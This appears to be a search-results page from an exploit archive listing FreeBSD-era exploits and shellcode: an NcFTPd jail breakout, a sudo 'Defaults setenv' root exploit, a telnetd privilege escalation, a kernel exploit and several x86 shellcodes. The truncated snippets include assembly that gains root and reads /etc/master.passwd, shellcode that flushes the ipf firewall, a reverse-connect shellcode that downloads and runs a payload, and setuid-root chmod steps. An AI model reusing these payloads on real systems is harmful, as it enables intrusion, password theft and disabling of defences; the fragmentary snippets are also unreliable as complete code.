25 matches found
NcFTPd <= 2.8.5 - Remote Jail Breakout Vulnerability
NcFTPd <= 2.8.5 remote jail breakout Discovered by: Kingcope Contact: kcope2atgooglemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFT...
Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit
!/bin/sh Sudo <= 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- Defaults setenv so environ vars are preserved : --- May also need the current users password to be type...
NcFTPD 2.8.5 Jail Breakout
NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 220 localhost NcFTPd Server unregister...
NcFTPd 2.8.5 - Remote Jail Breakout
NcFTPd 2.8.5 - Remote Jail Breakout NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 22...
NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability
Exploit for freebsd platform in category remote exploits ================================================== NcFTPd get /etc/passwd passwd local: passwd remote: /etc/passwd 502 Unimplemented command. 227 Entering Passive Mode 192,168,2,5,219,171 550 No such file. ftp ls .. 227 Entering Passive Mod...
FreeBSD/x86 - setuid(0)&execve({"//sbin/ipf","-Faa",0},0); - 57 bytes
; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...
FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code execution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when executing /bin/login, wha...
FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code execution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when executing /bin/login, what leads to a possible...
FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
Exploit for freebsd platform in category local exploits ==================================================================== FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit ==================================================================== FreeBSD 7.0-RELEASE telnet daemon...
FreeBSD 7/6x protosw kernel exploit
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 uname -rs FreeBSD 7.0-RELEASE id uid=1001donb gid=1001donb groups=1001donb,0wheel grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproclock cc -o x x.c ./x...
Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit
!/bin/sh Sudo <= 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- "Defaults setenv" so environ vars are preserved : --- May also need the current users password to be...
Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation
Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation !/bin/sh Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0; execl"/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL;...
CVE-2008-4247
ftpd in OpenBSD 4.3, FreeBSD 7.0, NetBSD 4.0, Solaris, and possibly other operating systems interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
/ ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
freebsd/x86 rev connect, recv, jmp, return results 90 bytes. Shellcode exploit for freebsdx86 platform / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 pls ex...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
Exploit for freebsd/x86 platform in category shellcode =========================================================== freebsd/x86 rev connect, recv, jmp, return results 90 bytes =========================================================== / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exi...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
Exploit for freebsd/x86 platform in category shellcode ============================================================ freebsd/x86 /bin/cat /etc/master.passwd NULL free 65 bytes ============================================================ ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBS...